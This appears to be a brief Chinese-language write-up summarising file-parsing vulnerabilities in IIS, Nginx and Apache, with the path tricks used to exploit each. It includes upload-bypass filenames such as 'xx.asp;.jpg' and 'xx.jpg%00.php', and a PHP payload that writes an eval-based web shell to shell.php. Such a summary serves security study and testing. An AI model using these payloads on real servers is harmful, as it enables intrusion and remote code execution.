Web服务器解析漏洞总结

Web服务器解析漏洞总结


0x01 IIS 5.x/6.0解析漏洞


利用方法有两种：
1.目录解析
/xx.asp/xx.jpg 
2.文件解析
/xx.asp;.jpg
IIS6.0不会把上面的文件当做jpg格式文件处理，而是当成了asp文件
wooyun上的IIS 6.0解析漏洞利用案例:
http://www.wooyun.org/searchbug.php?q=IIS6.0


0x02 IIS7.0/IIS7.5/Nginx<8.03 解析漏洞


这个漏洞是80sec研究出来的，见
1.http://www.80sec.com/nginx-securit.html
2.http://www.laruence.com/2010/05/20/1495.html


在默认Fast-CGI开启状况下,上传一个名字为xx.jpg，内容为

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

的文件，然后访问xx.jpg/.php,在这个目录下就会生成一句话木马 shell.php


0x03 Nginx < 8.03空字节代码执行漏洞


Ngnix在图片中其纳入PHP代码然后通过访问：
xx.jpg%00.php
来执行其中的代码


Nginx 空字节代执行漏洞案例：
http://www.wooyun.org/searchbug.php?q=%2500.php


0x04 Apache解析漏洞


Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断.


比如 xx.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把xx.php.owf.rar解析成xx.php


0x05 参考


http://drops.wooyun.org/papers/539